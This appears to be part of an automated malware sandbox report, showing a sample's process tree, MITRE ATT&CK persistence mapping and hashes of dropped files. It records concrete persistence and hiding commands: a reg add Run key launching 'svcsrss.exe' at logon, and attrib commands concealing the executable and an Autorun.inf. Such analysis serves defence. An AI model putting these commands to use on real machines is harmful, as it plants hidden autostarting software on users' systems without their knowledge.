C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2528
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4584
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:4296
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3740
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4944
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:5116
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:816
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3444
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2420
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:2808
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2140
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2160
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3616
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2924
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:4368
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2524
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1236
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:3420
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3660
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4756
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
230B
MD5e06b867ff16fea639a2ce7eb75999d39
SHA19d0a4ee56a165c12aaee5c50c481fbaa7c786c4c
SHA2566e1629744fab36a3edf8d15f0fcbdc84e29a924044a94ee094567bd12978ab71
SHA512098d5d2b0339fdab20eca77cd6ffa42db743c1ff6a33912e00ae397631dee8813bf048c4f7cc22c36d99c81b5a4de412a6bc8ffca55f3e7bb98f8f2fa6d77d46
-
Filesize
162B
MD582ada0aa3ddf28d0358ef54af2f1a956
SHA14ed4c84a0209e7c534643bd786d99050216293f5
SHA256f34a4f018ed9bb24615344e7a9cf97f346f1a8542078c12627a17ef2697ba20c
SHA512dcd222d701556da50b87ef05685b5ce760a33cf84d315cbf2ac248c061cf3ea2231ff9c0f8490e71e75a5f736633e4c101c689a23bd566880788a8ac975b6928
-
Filesize
144B
MD59aa3fa5c9e06a58b9e0f99ad893655c1
SHA1efce5888047631097097bce1c66be4a70f855525
SHA256e7a1aa0bbec1fcb9eaf17ac3d3748b0076b59c897577ca39e113e9f96ef598d2
SHA5123c9a6a2f5aab544ee14cf1d5ad886694ca544451010050c2479bbb05e315d8213bdf23ee042da7912f90968103e46e585cc814e87fb377a1a3440a544f5cb940
-
Filesize
198B
MD549907b4e5be0f91edeeb0213555a36af
SHA16ac46bd31716d71a1011ffe1c643ec5cdef311cb
SHA256284992fe776aa822cf683297c0ae20d53b41ae8f53c0c4cc6bde61adc3014dcf
SHA5123e64d534b03bf111438c1e21cf18279a9646c092cf6d3eefe7cb414394f0db89885b50925f06b73c2f610c9e492ff2c5e0269acb2abca100e6be75c5f1f51491
-
Filesize
19KB
MD592aea9a4258be305cae995c63f7a5639
SHA1f7e317b324c08d710d6e3489ba2ffbb363590013
SHA2562ef1878edbb5869baed1febbc4ed624331c98c6b8dbdebacf06421f649856e97
SHA512b101636bf4f9db0868284ab5f428f7151e0ca5f2d3739985ecee8776abcd44f13bab5bf56bda934175072b455c1a782bc23f76771d7ae26803443c504e242bc1
-
Filesize
246B
MD551a9b4e50519bec2705fc31b9429b658
SHA1189534073badc46b46868c5c2fc214f6ddef80b3
SHA256247616d30cac570030ccdeda295e267e60e62a8b99ae3c428f2a51a76b709ffb
SHA5126be1142f25c21298e0ea42dae1f95a67f0bcf887ff6ae630d06655792cebdc8014f880d0331c85788b9a556c8791e7dcbdc3682283edd1da94edf5a9e3ced7e1
-
Filesize
3B
MD5bc949ea893a9384070c31f083ccefd26
SHA1cbb8391cb65c20e2c05a2f29211e55c49939c3db
SHA2566bdf66b5bf2a44e658bea2ee86695ab150a06e600bf67cd5cce245ad54962c61
SHA512e4288e71070485637ec5825f510a7daa7e75ef6c71a1b755f51e1b0f2e58e5066837f58408ea74d75db42c49372c6027d433a869904fc5efaf4876dfcfde1287